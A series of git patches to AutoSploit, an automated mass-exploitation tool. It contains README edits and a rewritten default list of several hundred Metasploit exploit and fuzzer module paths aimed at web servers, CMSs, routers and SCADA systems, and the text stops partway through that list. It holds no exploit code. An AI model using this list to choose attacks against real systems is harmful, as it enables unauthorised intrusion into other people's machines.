From 8e4816801caaf2751bfcb945f0bfcca06ba3d4e0 Mon Sep 17 00:00:00 2001 From: Ekultek Date: Thu, 1 Mar 2018 11:43:46 -0600 Subject: [PATCH 1/7] Added a helpful link directory --- README.md | 13 ++++++++++++- 1 file changed, 12 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 850d373..33c8146 100644 --- a/README.md +++ b/README.md @@ -9,6 +9,14 @@ Receiving back connections on your local machine might not be the best idea from The new version of AutoSploit has a feature that allows you to set a proxy before you connect and a custom user-agent. +# Helpful links + - [Usage](https://github.com/NullArray/AutoSploit#usage) + - [Dependencies](https://github.com/NullArray/AutoSploit#dependencies) + - [User Manual](https://github.com/NullArray/AutoSploit/wiki) + - [Shoutouts](https://github.com/NullArray/AutoSploit#acknowledgements) + - [Development](https://github.com/NullArray/AutoSploit#active-development) + - [Discord server](https://discord.gg/9BeeZQk) + ## Usage Clone the repo. Or deploy via Docker. Details for which can be found [here](https://github.com/NullArray/AutoSploit/tree/master/Docker) @@ -113,10 +121,13 @@ And thanks to [Khast3x](https://github.com/khast3x) for setting up Docker suppor ### Active Development + While this isn't exactly a Beta release it is an early release nonetheless as such the tool might be subject to changes in the future. I've been working on the new version of the tool in an open source capacity with the help of a number of developers -that have expressed an interest in doing so. The new version will include extra features such as the ability to load in a custom target and exploit list among many more enhancements. If you would like to keep up to date on all the most recent developments be sure to check out the [Development Branch](https://github.com/NullArray/AutoSploit/tree/dev-beta) +that have expressed an interest in doing so. The new version will include extra features such as the ability to load in a custom target and exploit list among many more enhancements. If you would like to keep up to date on all the most recent developments be sure to check out the [Development Branch](https://github.com/NullArray/AutoSploit/tree/dev-beta). + +If you need some help understanding the code, or want to chat with some other AutoSploit community members, feel free to join our [Discord chat](https://discord.gg/9BeeZQk). ### Note From 33671f25d5393cff0f740acae7129fb06ecc5010 Mon Sep 17 00:00:00 2001 From: NullArray Date: Thu, 1 Mar 2018 17:53:20 +0000 Subject: [PATCH 2/7] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 33c8146..c7ebacf 100644 --- a/README.md +++ b/README.md @@ -122,7 +122,7 @@ And thanks to [Khast3x](https://github.com/khast3x) for setting up Docker suppor ### Active Development -While this isn't exactly a Beta release it is an early release nonetheless as such the tool might be subject to changes in the future. +While this isn't exactly a Beta release, AutoSploit 2.0 is an early release nonetheless as such the tool might be subject to changes in the future. I've been working on the new version of the tool in an open source capacity with the help of a number of developers that have expressed an interest in doing so. The new version will include extra features such as the ability to load in a custom target and exploit list among many more enhancements. If you would like to keep up to date on all the most recent developments be sure to check out the [Development Branch](https://github.com/NullArray/AutoSploit/tree/dev-beta). From 425799885ca026f075ea07c8b3ce593e33d9de4b Mon Sep 17 00:00:00 2001 From: NullArray Date: Thu, 1 Mar 2018 18:34:12 +0000 Subject: [PATCH 3/7] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index c7ebacf..3fc99e1 100644 --- a/README.md +++ b/README.md @@ -125,7 +125,7 @@ And thanks to [Khast3x](https://github.com/khast3x) for setting up Docker suppor While this isn't exactly a Beta release, AutoSploit 2.0 is an early release nonetheless as such the tool might be subject to changes in the future. I've been working on the new version of the tool in an open source capacity with the help of a number of developers -that have expressed an interest in doing so. The new version will include extra features such as the ability to load in a custom target and exploit list among many more enhancements. If you would like to keep up to date on all the most recent developments be sure to check out the [Development Branch](https://github.com/NullArray/AutoSploit/tree/dev-beta). +that have expressed an interest in doing so. If you would like to keep up to date on all the most recent developments be sure to check out the [Development Branch](https://github.com/NullArray/AutoSploit/tree/dev-beta). If you need some help understanding the code, or want to chat with some other AutoSploit community members, feel free to join our [Discord chat](https://discord.gg/9BeeZQk). From 7c0ea6b0b34ff225ac7c7e402718c5a172bc25dc Mon Sep 17 00:00:00 2001 From: NullArray Date: Thu, 1 Mar 2018 18:41:31 +0000 Subject: [PATCH 4/7] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 3fc99e1..e4b81a3 100644 --- a/README.md +++ b/README.md @@ -127,6 +127,8 @@ While this isn't exactly a Beta release, AutoSploit 2.0 is an early release none I've been working on the new version of the tool in an open source capacity with the help of a number of developers that have expressed an interest in doing so. If you would like to keep up to date on all the most recent developments be sure to check out the [Development Branch](https://github.com/NullArray/AutoSploit/tree/dev-beta). +If you would like to contribute to the development of this project please be sure to read [CONTRIBUTING.md](https://github.com/NullArray/AutoSploit/blob/master/CONTRIBUTING.md) as it contains our contribution guidelines. + If you need some help understanding the code, or want to chat with some other AutoSploit community members, feel free to join our [Discord chat](https://discord.gg/9BeeZQk). ### Note From b640ab8b5895dfa592ace2fd98531872363772f4 Mon Sep 17 00:00:00 2001 From: selora Date: Mon, 2 Apr 2018 16:08:06 -0400 Subject: [PATCH 5/7] Added reporting to CSV file Metasploit output is logged (anything prefixed by '[+||-||*]') Changed from straight command-line invocation to rc-scripts per-hosts/per-modules. MSF module output to console --- etc/json/default_modules.json | 570 +++++++++++++++++----------------- lib/exploitation/exploiter.py | 105 ++++++- lib/settings.py | 28 +- 3 files changed, 398 insertions(+), 305 deletions(-) diff --git a/etc/json/default_modules.json b/etc/json/default_modules.json index ca7f102..f30a51b 100644 --- a/etc/json/default_modules.json +++ b/etc/json/default_modules.json @@ -1,289 +1,289 @@ { "exploits": [ - "exploit/windows/firewall/blackice_pam_icq; exploit", - "exploit/windows/ftp/ms09_053_ftpd_nlst;exploit", - "exploit/windows/http/amlibweb_webquerydll_app;exploit", - "exploit/windows/http/ektron_xslt_exec_ws;exploit", - "exploit/windows/http/umbraco_upload_aspx;exploit", - "exploit/windows/iis/iis_webdav_scstoragepathfromurl;exploit", - "exploit/windows/iis/iis_webdav_upload_asp;exploit", - "exploit/windows/iis/ms01_023_printer;exploit", - "exploit/windows/iis/ms01_026_dbldecode;exploit", - "exploit/windows/iis/ms01_033_idq;exploit", - "exploit/windows/iis/ms02_018_htr;exploit", - "exploit/windows/iis/ms02_065_msadc;exploit", - "exploit/windows/iis/ms03_007_ntdll_webdav;exploit", - "exploit/windows/iis/msadc;exploit", - "exploit/windows/isapi/ms00_094_pbserver;exploit", - "exploit/windows/isapi/ms03_022_nsiislog_post;exploit", - "exploit/windows/isapi/ms03_051_fp30reg_chunked;exploit", - "exploit/windows/isapi/rsa_webagent_redirect;exploit", - "exploit/windows/isapi/w3who_query;exploit", - "exploit/windows/scada/advantech_webaccess_dashboard_file_upload;exploit", - "exploit/windows/ssl/ms04_011_pct;exploit", - "exploit/freebsd/http/watchguard_cmd_exec;exploit ", - "exploit/linux/http/alienvault_exec;exploit ", - "exploit/linux/http/alienvault_sqli_exec;exploit ", - "exploit/linux/http/astium_sqli_upload;exploit ", - "exploit/linux/http/centreon_sqli_exec;exploit ", - "exploit/linux/http/centreon_useralias_exec;exploit ", - "exploit/linux/http/crypttech_cryptolog_login_exec;exploit ", - "exploit/linux/http/dolibarr_cmd_exec;exploit ", - "exploit/linux/http/goautodial_3_rce_command_injection;exploit", - "exploit/linux/http/kloxo_sqli;exploit ", - "exploit/linux/http/nagios_xi_chained_rce;exploit ", - "exploit/linux/http/netgear_wnr2000_rce;exploit ", - "exploit/linux/http/pandora_fms_sqli;exploit ", - "exploit/linux/http/riverbed_netprofiler_netexpress_exe;exploit ", - "exploit/linux/http/wd_mycloud_multiupload_upload;exploit ", - "exploit/linux/http/zabbix_sqli;exploit ", - "exploit/linux/misc/qnap_transcode_server;exploit ", - "exploit/linux/mysql/mysql_yassl_getname;exploit ", - "exploit/linux/mysql/mysql_yassl_hello;exploit ", - "exploit/linux/postgres/postgres_payload;exploit ", - "exploit/linux/samba/is_known_pipename;exploit ", - "exploit/multi/browser/java_jre17_driver_manager;exploit ", - "exploit/multi/http/atutor_sqli;exploit ", - "exploit/multi/http/dexter_casinoloader_exec;exploit ", - "exploit/multi/http/drupal_drupageddon;exploit ", - "exploit/multi/http/manage_engine_dc_pmp_sqli;exploit ", - "exploit/multi/http/manageengine_search_sqli;exploit ", - "exploit/multi/http/movabletype_upgrade_exec;exploit ", - "exploit/multi/http/php_volunteer_upload_exe;exploit ", - "exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli;exploit ", - "exploit/multi/http/splunk_mappy_exec;exploit ", - "exploit/multi/http/testlink_upload_exec;exploit ", - "exploit/multi/http/zpanel_information_disclosure_rce;exploit ", - "exploit/multi/misc/legend_bot_exec;exploit ", - "exploit/multi/mysql/mysql_udf_payload;exploit ", - "exploit/multi/postgres/postgres_createlang;exploit ", - "exploit/solaris/sunrpc/ypupdated_exec;exploit ", - "exploit/unix/ftp/proftpd_133c_backdoor;exploit ", - "exploit/unix/http/tnftp_savefile;exploit ", - "exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit ", - "exploit/unix/webapp/kimai_sqli;exploit ", - "exploit/unix/webapp/openemr_sqli_privesc_upload;exploit ", - "exploit/unix/webapp/seportal_sqli_exec;exploit ", - "exploit/unix/webapp/vbulletin_vote_sqli_exec;exploit ", - "exploit/unix/webapp/vicidial_manager_send_cmd_exec;exploit", - "exploit/windows/antivirus/symantec_endpoint_manager_rce;exploit ", - "exploit/windows/http/apache_mod_rewrite_ldap;exploit ", - "exploit/windows/http/ca_totaldefense_regeneratereports;exploit", - "exploit/windows/http/cyclope_ess_sqli;exploit", - "exploit/windows/http/hp_mpa_job_acct;exploit", - "exploit/windows/http/solarwinds_storage_manager_sql;exploit", - "exploit/windows/http/sonicwall_scrutinizer_sql;exploit", - "exploit/windows/misc/altiris_ds_sqli;exploit ", - "exploit/windows/misc/fb_cnct_group;exploit ", - "exploit/windows/misc/lianja_db_net;exploit ", - "exploit/windows/misc/manageengine_eventlog_analyzer_rce;exploit ", - "exploit/windows/mssql/lyris_listmanager_weak_pass;exploit ", - "exploit/windows/mssql/ms02_039_slammer;exploit ", - "exploit/windows/mssql/ms09_004_sp_replwritetovarbin;exploit ", - "exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli;exploit ", - "exploit/windows/mssql/mssql_linkcrawler;exploit ", - "exploit/windows/mssql/mssql_payload;exploit ", - "exploit/windows/mssql/mssql_payload_sqli;exploit ", - "exploit/windows/mysql/mysql_mof;exploit ", - "exploit/windows/mysql/mysql_start_up;exploit ", - "exploit/windows/mysql/mysql_yassl_hello;exploit", - "exploit/windows/mysql/scrutinizer_upload_exec;exploit ", - "exploit/windows/postgres/postgres_payload;exploit ", - "exploit/windows/scada/realwin_on_fcs_login;exploit", - "exploit/multi/http/rails_actionpack_inline_exec;exploit", - "exploit/multi/http/rails_dynamic_render_code_exec;exploit", - "exploit/multi/http/rails_json_yaml_code_exec;exploit", - "exploit/multi/http/rails_secret_deserialization;exploit", - "exploit/multi/http/rails_web_console_v2_code_exec;exploit", - "exploit/multi/http/rails_xml_yaml_code_exec;exploit", - "exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit", - "exploit/multi/http/phpmoadmin_exec;exploit", - "exploit/multi/http/phpmyadmin_3522_backdoor;exploit", - "exploit/multi/http/phpmyadmin_preg_replace;exploit", - "exploit/multi/http/phpscheduleit_start_date;exploit", - "exploit/multi/http/phptax_exec;exploit", - "exploit/multi/http/phpwiki_ploticus_exec;exploit", - "exploit/multi/http/plone_popen2;exploit", - "exploit/multi/http/pmwiki_pagelist;exploit", - "exploit/multi/http/joomla_http_header_rce;exploit", - "exploit/multi/http/novell_servicedesk_rce;exploit", - "exploit/multi/http/oracle_reports_rce;exploit", - "exploit/multi/http/php_utility_belt_rce;exploit", - "exploit/multi/http/phpfilemanager_rce;exploit", - "exploit/multi/http/processmaker_exec;exploit", - "exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit", - "exploit/multi/http/spree_search_exec;exploit", - "exploit/multi/http/spree_searchlogic_exec;exploit", - "exploit/multi/http/struts_code_exec_parameters;exploit", - "exploit/multi/http/vtiger_install_rce;exploit", - "exploit/multi/http/werkzeug_debug_rce;exploit", - "exploit/multi/http/zemra_panel_rce;exploit", - "exploit/multi/http/zpanel_information_disclosure_rce;exploit", - "exploit/multi/http/joomla_http_header_rce;exploit", - "exploit/unix/webapp/joomla_akeeba_unserialize;exploit", - "exploit/unix/webapp/joomla_comjce_imgmanager;exploit", - "exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit", - "exploit/unix/webapp/joomla_media_upload_exec;exploit", - "exploit/multi/http/builderengine_upload_exec;exploit", - "exploit/multi/http/caidao_php_backdoor_exec;exploit", - "exploit/multi/http/atutor_sqli;exploit ", - "exploit/multi/http/ajaxplorer_checkinstall_exec;exploit", - "exploit/multi/http/apache_activemq_upload_jsp;exploit -", - "exploit/unix/webapp/wp_lastpost_exec;exploit -", - "exploit/unix/webapp/wp_mobile_detector_upload_execute;exploit", - "exploit/multi/http/axis2_deployer;exploit", - "exploit/unix/webapp/wp_foxypress_upload;exploit", - "exploit/linux/http/tr064_ntpserver_cmdinject;exploit", - "exploit/linux/misc/quest_pmmasterd_bof;exploit", - "exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload;exploit", - "exploit/unix/webapp/php_xmlrpc_eval;exploit", - "exploit/unix/webapp/wp_admin_shell_upload;exploit", - "exploit/linux/http/sophos_wpa_sblistpack_exec;exploit", - "exploit/linux/local/sophos_wpa_clear_keys;exploit", - "exploit/multi/http/zpanel_information_disclosure_rce;exploit", - "auxiliary/admin/cisco/cisco_asa_extrabacon;exploit", - "auxiliary/admin/cisco/cisco_secure_acs_bypass;exploit", - "auxiliary/admin/cisco/vpn_3000_ftp_bypass;exploit", - "exploit/bsdi/softcart/mercantec_softcart;exploit ", - "exploit/freebsd/misc/citrix_netscaler_soap_bof;exploit", - "exploit/freebsd/samba/trans2open;exploit", - "exploit/linux/ftp/proftp_sreplace;exploit ", - "exploit/linux/http/dcos_marathon;exploit", - "exploit/linux/http/f5_icall_cmd;exploit", - "exploit/linux/http/fritzbox_echo_exec;exploit", - "exploit/linux/http/gitlist_exec;exploit", - "exploit/linux/http/goautodial_3_rce_command_injection;exploit", - "exploit/linux/http/ipfire_bashbug_exec;exploit", - "exploit/linux/http/ipfire_oinkcode_exec;exploit", - "exploit/linux/http/ipfire_proxy_exec;exploit", - "exploit/linux/http/kaltura_unserialize_rce;exploit", - "exploit/linux/http/lifesize_uvc_ping_rce;exploit", - "exploit/linux/http/nagios_xi_chained_rce;exploit", - "exploit/linux/http/netgear_dgn1000_setup_unauth_exec;exploit", - "exploit/linux/http/netgear_wnr2000_rce ;exploit", - "exploit/linux/http/nuuo_nvrmini_auth_rce;exploit", - "exploit/linux/http/nuuo_nvrmini_unauth_rce;exploit", - "exploit/linux/http/op5_config_exec;exploit", - "exploit/linux/http/pandora_fms_exec;exploit", - "exploit/linux/http/pineapple_preconfig_cmdinject;exploit", - "exploit/linux/http/seagate_nas_php_exec_noauth;exploit", - "exploit/linux/http/symantec_messaging_gateway_exec;exploit", - "exploit/linux/http/trendmicro_imsva_widget_exec;exploit", - "exploit/linux/http/trueonline_billion_5200w_rce;exploit", - "exploit/linux/http/trueonline_p660hn_v1_rce;exploit", - "exploit/linux/http/trueonline_p660hn_v2_rce;exploit", - "exploit/linux/http/vcms_upload;exploit", - "exploit/linux/misc/lprng_format_string;exploit", - "exploit/linux/misc/mongod_native_helper;exploit", - "exploit/linux/misc/ueb9_bpserverd;exploit", - "exploit/linux/mysql/mysql_yassl_getname;exploit", - "exploit/linux/pop3/cyrus_pop3d_popsubfolders;exploit", - "exploit/linux/postgres/postgres_payload;exploit", - "exploit/linux/pptp/poptop_negative_read;exploit", - "exploit/linux/proxy/squid_ntlm_authenticate;exploit", - "exploit/linux/samba/lsa_transnames_heap;exploit", - "exploit/linux/samba/setinfopolicy_heap;exploit", - "exploit/linux/samba/trans2open;exploit", - "exploit/multi/elasticsearch/script_mvel_rce;exploit", - "exploit/multi/elasticsearch/search_groovy_script;exploit", - "exploit/multi/http/atutor_sqli;exploit", - "exploit/multi/http/axis2_deployer;exploit", - "exploit/multi/http/familycms_less_exe;exploit", - "exploit/multi/http/freenas_exec_raw;exploit", - "exploit/multi/http/gestioip_exec;exploit", - "exploit/multi/http/glassfish_deployer;exploit", - "exploit/multi/http/glpi_install_rce;exploit", - "exploit/multi/http/joomla_http_header_rce;exploit ", - "exploit/multi/http/makoserver_cmd_exec;exploit", - "exploit/multi/http/novell_servicedesk_rc;exploit", - "exploit/multi/http/oracle_reports_rce;exploit", - "exploit/multi/http/php_utility_belt_rce;exploit", - "exploit/multi/http/phpfilemanager_rce;exploit", - "exploit/multi/http/phpmyadmin_3522_backdoor;exploit", - "exploit/multi/http/phpwiki_ploticus_exec;exploit", - "exploit/multi/http/processmaker_exec;exploit", - "exploit/multi/http/rails_actionpack_inline_exec;exploit", - "exploit/multi/http/rails_dynamic_render_code_exec;exploit", - "exploit/multi/http/rails_secret_deserialization;exploit", - "exploit/multi/http/rocket_servergraph_file_requestor_rce;exploit", - "exploit/multi/http/simple_backdoors_exec;exploit", - "exploit/multi/http/spree_search_exec;exploit", - "exploit/multi/http/spree_searchlogic_exec;exploit", - "exploit/multi/http/struts2_rest_xstream;exploit", - "exploit/multi/http/struts_code_exec;exploit", - "exploit/multi/http/struts_code_exec_classloader;exploit", - "exploit/multi/http/struts_code_exec_parameters;exploit", - "exploit/multi/http/struts_dev_mode;exploit", - "exploit/multi/http/sysaid_auth_file_upload;exploit", - "exploit/multi/http/tomcat_jsp_upload_bypass;exploit", - "exploit/multi/http/vtiger_install_rce;exploit", - "exploit/multi/http/werkzeug_debug_rce;exploit", - "exploit/multi/http/zemra_panel_rce;exploit", - "exploit/multi/http/zpanel_information_disclosure_rce;exploit", - "exploit/multi/ids/snort_dce_rpc;exploit", - "exploit/multi/misc/batik_svg_java;exploit", - "exploit/multi/misc/pbot_exec;exploit", - "exploit/multi/misc/veritas_netbackup_cmdexec;exploit", - "exploit/multi/mysql/mysql_udf_payload;exploit", - "exploit/multi/php/php_unserialize_zval_cookie;exploit", - "exploit/unix/http/freepbx_callmenum;exploit", - "exploit/unix/http/lifesize_room;exploit", - "exploit/unix/http/pfsense_clickjacking;exploit", - "exploit/unix/http/pfsense_group_member_exec;exploit", - "exploit/unix/http/tnftp_savefile;exploit", - "exploit/unix/misc/polycom_hdx_traceroute_exec;exploit", - "exploit/unix/webapp/awstats_migrate_exec;exploit", - "exploit/unix/webapp/carberp_backdoor_exec;exploit", - "exploit/unix/webapp/citrix_access_gateway_exec;exploit", - "exploit/unix/webapp/dogfood_spell_exec;exploit", - "exploit/unix/webapp/invision_pboard_unserialize_exec;exploit", - "exploit/unix/webapp/joomla_contenthistory_sqli_rce;exploit", - "exploit/unix/webapp/mybb_backdoor;exploit", - "exploit/unix/webapp/opensis_modname_exec;exploit", - "exploit/unix/webapp/oscommerce_filemanager;exploit", - "exploit/unix/webapp/piwik_superuser_plugin_upload;exploit", - "exploit/unix/webapp/tikiwiki_upload_exec;exploit", - "exploit/unix/webapp/webtester_exec;exploit", - "exploit/unix/webapp/wp_phpmailer_host_header;exploit", - "exploit/unix/webapp/wp_total_cache_exec;exploit", - "exploit/windows/antivirus/symantec_endpoint_manager_rce;exploit", - "exploit/windows/http/ektron_xslt_exec;exploit", - "exploit/windows/http/ektron_xslt_exec_ws;exploit", - "exploit/windows/http/geutebrueck_gcore_x64_rce_bo;exploit", - "exploit/windows/http/hp_autopass_license_traversal;exploit", - "exploit/windows/http/manage_engine_opmanager_rce;exploit", - "exploit/windows/http/netgear_nms_rce;exploit", - "exploit/windows/http/sepm_auth_bypass_rce;exploit", - "exploit/windows/http/trendmicro_officescan_widget_exec;exploit", - "exploit/windows/iis/iis_webdav_upload_asp;exploit", - "exploit/windows/iis/msadc;exploit", - "exploit/windows/misc/manageengine_eventlog_analyzer_rce;exploit", - "exploit/windows/novell/file_reporter_fsfui_upload;exploit", - "exploit/windows/scada/ge_proficy_cimplicity_gefebt;exploit", - "exploit/windows/smb/ipass_pipe_exec;exploit", - "exploit/windows/smb/smb_relay;exploit", - "auxiliary/sqli/oracle/jvm_os_code_10g;exploit", - "auxiliary/sqli/oracle/jvm_os_code_11g;exploit", - "auxiliary/fuzzers/dns/dns_fuzzer;exploit", - "auxiliary/fuzzers/ftp/client_ftp;exploit", - "auxiliary/fuzzers/ftp/ftp_pre_post;exploit", - "auxiliary/fuzzers/http/http_form_field;exploit", - "auxiliary/fuzzers/http/http_get_uri_long;exploit", - "auxiliary/fuzzers/http/http_get_uri_strings;exploit", - "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer;exploit", - "auxiliary/fuzzers/smb/smb2_negotiate_corrupt;exploit", - "auxiliary/fuzzers/smb/smb_create_pipe;exploit", - "auxiliary/fuzzers/smb/smb_create_pipe_corrupt;exploit", - "auxiliary/fuzzers/smb/smb_negotiate_corrupt;exploit ", - "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt;exploit", - "auxiliary/fuzzers/smb/smb_tree_connect;exploit", - "auxiliary/fuzzers/smb/smb_tree_connect_corrupt;exploit", - "auxiliary/fuzzers/smtp/smtp_fuzzer;exploit", - "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt;exploit", - "auxiliary/fuzzers/ssh/ssh_version_15;exploit", - "auxiliary/fuzzers/ssh/ssh_version_2;exploit", - "auxiliary/fuzzers/ssh/ssh_version_corrupt;exploit", - "auxiliary/fuzzers/tds/tds_login_corrupt;exploit", - "auxiliary/fuzzers/tds/tds_login_username;exploit" + "exploit/windows/ftp/ms09_053_ftpd_nlst", + "exploit/windows/firewall/blackice_pam_icq", + "exploit/windows/http/amlibweb_webquerydll_app", + "exploit/windows/http/ektron_xslt_exec_ws", + "exploit/windows/http/umbraco_upload_aspx", + "exploit/windows/iis/iis_webdav_scstoragepathfromurl", + "exploit/windows/iis/iis_webdav_upload_asp", + "exploit/windows/iis/ms01_023_printer", + "exploit/windows/iis/ms01_026_dbldecode", + "exploit/windows/iis/ms01_033_idq", + "exploit/windows/iis/ms02_018_htr", + "exploit/windows/iis/ms02_065_msadc", + "exploit/windows/iis/ms03_007_ntdll_webdav", + "exploit/windows/iis/msadc", + "exploit/windows/isapi/ms00_094_pbserver", + "exploit/windows/isapi/ms03_022_nsiislog_post", + "exploit/windows/isapi/ms03_051_fp30reg_chunked", + "exploit/windows/isapi/rsa_webagent_redirect", + "exploit/windows/isapi/w3who_query", + "exploit/windows/scada/advantech_webaccess_dashboard_file_upload", + "exploit/windows/ssl/ms04_011_pct", + "exploit/freebsd/http/watchguard_cmd_exec ", + "exploit/linux/http/alienvault_exec ", + "exploit/linux/http/alienvault_sqli_exec ", + "exploit/linux/http/astium_sqli_upload ", + "exploit/linux/http/centreon_sqli_exec ", + "exploit/linux/http/centreon_useralias_exec ", + "exploit/linux/http/crypttech_cryptolog_login_exec ", + "exploit/linux/http/dolibarr_cmd_exec ", + "exploit/linux/http/goautodial_3_rce_command_injection", + "exploit/linux/http/kloxo_sqli ", + "exploit/linux/http/nagios_xi_chained_rce ", + "exploit/linux/http/netgear_wnr2000_rce ", + "exploit/linux/http/pandora_fms_sqli ", + "exploit/linux/http/riverbed_netprofiler_netexpress_exe ", + "exploit/linux/http/wd_mycloud_multiupload_upload ", + "exploit/linux/http/zabbix_sqli ", + "exploit/linux/misc/qnap_transcode_server ", + "exploit/linux/mysql/mysql_yassl_getname ", + "exploit/linux/mysql/mysql_yassl_hello ", + "exploit/linux/postgres/postgres_payload ", + "exploit/linux/samba/is_known_pipename ", + "exploit/multi/browser/java_jre17_driver_manager ", + "exploit/multi/http/atutor_sqli ", + "exploit/multi/http/dexter_casinoloader_exec ", + "exploit/multi/http/drupal_drupageddon ", + "exploit/multi/http/manage_engine_dc_pmp_sqli ", + "exploit/multi/http/manageengine_search_sqli ", + "exploit/multi/http/movabletype_upgrade_exec ", + "exploit/multi/http/php_volunteer_upload_exe ", + "exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli ", + "exploit/multi/http/splunk_mappy_exec ", + "exploit/multi/http/testlink_upload_exec ", + "exploit/multi/http/zpanel_information_disclosure_rce ", + "exploit/multi/misc/legend_bot_exec ", + "exploit/multi/mysql/mysql_udf_payload ", + "exploit/multi/postgres/postgres_createlang ", + "exploit/solaris/sunrpc/ypupdated_exec ", + "exploit/unix/ftp/proftpd_133c_backdoor ", + "exploit/unix/http/tnftp_savefile ", + "exploit/unix/webapp/joomla_contenthistory_sqli_rce ", + "exploit/unix/webapp/kimai_sqli ", + "exploit/unix/webapp/openemr_sqli_privesc_upload ", + "exploit/unix/webapp/seportal_sqli_exec ", + "exploit/unix/webapp/vbulletin_vote_sqli_exec ", + "exploit/unix/webapp/vicidial_manager_send_cmd_exec", + "exploit/windows/antivirus/symantec_endpoint_manager_rce ", + "exploit/windows/http/apache_mod_rewrite_ldap ", + "exploit/windows/http/ca_totaldefense_regeneratereports", + "exploit/windows/http/cyclope_ess_sqli", + "exploit/windows/http/hp_mpa_job_acct", + "exploit/windows/http/solarwinds_storage_manager_sql", + "exploit/windows/http/sonicwall_scrutinizer_sql", + "exploit/windows/misc/altiris_ds_sqli ", + "exploit/windows/misc/fb_cnct_group ", + "exploit/windows/misc/lianja_db_net ", + "exploit/windows/misc/manageengine_eventlog_analyzer_rce ", + "exploit/windows/mssql/lyris_listmanager_weak_pass ", + "exploit/windows/mssql/ms02_039_slammer ", + "exploit/windows/mssql/ms09_004_sp_replwritetovarbin ", + "exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli ", + "exploit/windows/mssql/mssql_linkcrawler ", + "exploit/windows/mssql/mssql_payload ", + "exploit/windows/mssql/mssql_payload_sqli ", + "exploit/windows/mysql/mysql_mof ", + "exploit/windows/mysql/mysql_start_up ", + "exploit/windows/mysql/mysql_yassl_hello", + "exploit/windows/mysql/scrutinizer_upload_exec ", + "exploit/windows/postgres/postgres_payload ", + "exploit/windows/scada/realwin_on_fcs_login", + "exploit/multi/http/rails_actionpack_inline_exec", + "exploit/multi/http/rails_dynamic_render_code_exec", + "exploit/multi/http/rails_json_yaml_code_exec", + "exploit/multi/http/rails_secret_deserialization", + "exploit/multi/http/rails_web_console_v2_code_exec", + "exploit/multi/http/rails_xml_yaml_code_exec", + "exploit/multi/http/rocket_servergraph_file_requestor_rce", + "exploit/multi/http/phpmoadmin_exec", + "exploit/multi/http/phpmyadmin_3522_backdoor", + "exploit/multi/http/phpmyadmin_preg_replace", + "exploit/multi/http/phpscheduleit_start_date", + "exploit/multi/http/phptax_exec", + "exploit/multi/http/phpwiki_ploticus_exec", + "exploit/multi/http/plone_popen2", + "exploit/multi/http/pmwiki_pagelist", + "exploit/multi/http/joomla_http_header_rce", + "exploit/multi/http/novell_servicedesk_rce", + "exploit/multi/http/oracle_reports_rce", + "exploit/multi/http/php_utility_belt_rce", + "exploit/multi/http/phpfilemanager_rce", + "exploit/multi/http/processmaker_exec", + "exploit/multi/http/rocket_servergraph_file_requestor_rce", + "exploit/multi/http/spree_search_exec", + "exploit/multi/http/spree_searchlogic_exec", + "exploit/multi/http/struts_code_exec_parameters", + "exploit/multi/http/vtiger_install_rce", + "exploit/multi/http/werkzeug_debug_rce", + "exploit/multi/http/zemra_panel_rce", + "exploit/multi/http/zpanel_information_disclosure_rce", + "exploit/multi/http/joomla_http_header_rce", + "exploit/unix/webapp/joomla_akeeba_unserialize", + "exploit/unix/webapp/joomla_comjce_imgmanager", + "exploit/unix/webapp/joomla_contenthistory_sqli_rce", + "exploit/unix/webapp/joomla_media_upload_exec", + "exploit/multi/http/builderengine_upload_exec", + "exploit/multi/http/caidao_php_backdoor_exec", + "exploit/multi/http/atutor_sqli ", + "exploit/multi/http/ajaxplorer_checkinstall_exec", + "exploit/multi/http/apache_activemq_upload_jsp", + "exploit/unix/webapp/wp_lastpost_exec", + "exploit/unix/webapp/wp_mobile_detector_upload_execute", + "exploit/multi/http/axis2_deployer", + "exploit/unix/webapp/wp_foxypress_upload", + "exploit/linux/http/tr064_ntpserver_cmdinject", + "exploit/linux/misc/quest_pmmasterd_bof", + "exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload", + "exploit/unix/webapp/php_xmlrpc_eval", + "exploit/unix/webapp/wp_admin_shell_upload", + "exploit/linux/http/sophos_wpa_sblistpack_exec", + "exploit/linux/local/sophos_wpa_clear_keys", + "exploit/multi/http/zpanel_information_disclosure_rce", + "auxiliary/admin/cisco/cisco_asa_extrabacon", + "auxiliary/admin/cisco/cisco_secure_acs_bypass", + "auxiliary/admin/cisco/vpn_3000_ftp_bypass", + "exploit/bsdi/softcart/mercantec_softcart ", + "exploit/freebsd/misc/citrix_netscaler_soap_bof", + "exploit/freebsd/samba/trans2open", + "exploit/linux/ftp/proftp_sreplace ", + "exploit/linux/http/dcos_marathon", + "exploit/linux/http/f5_icall_cmd", + "exploit/linux/http/fritzbox_echo_exec", + "exploit/linux/http/gitlist_exec", + "exploit/linux/http/goautodial_3_rce_command_injection", + "exploit/linux/http/ipfire_bashbug_exec", + "exploit/linux/http/ipfire_oinkcode_exec", + "exploit/linux/http/ipfire_proxy_exec", + "exploit/linux/http/kaltura_unserialize_rce", + "exploit/linux/http/lifesize_uvc_ping_rce", + "exploit/linux/http/nagios_xi_chained_rce", + "exploit/linux/http/netgear_dgn1000_setup_unauth_exec", + "exploit/linux/http/netgear_wnr2000_rce ", + "exploit/linux/http/nuuo_nvrmini_auth_rce", + "exploit/linux/http/nuuo_nvrmini_unauth_rce", + "exploit/linux/http/op5_config_exec", + "exploit/linux/http/pandora_fms_exec", + "exploit/linux/http/pineapple_preconfig_cmdinject", + "exploit/linux/http/seagate_nas_php_exec_noauth", + "exploit/linux/http/symantec_messaging_gateway_exec", + 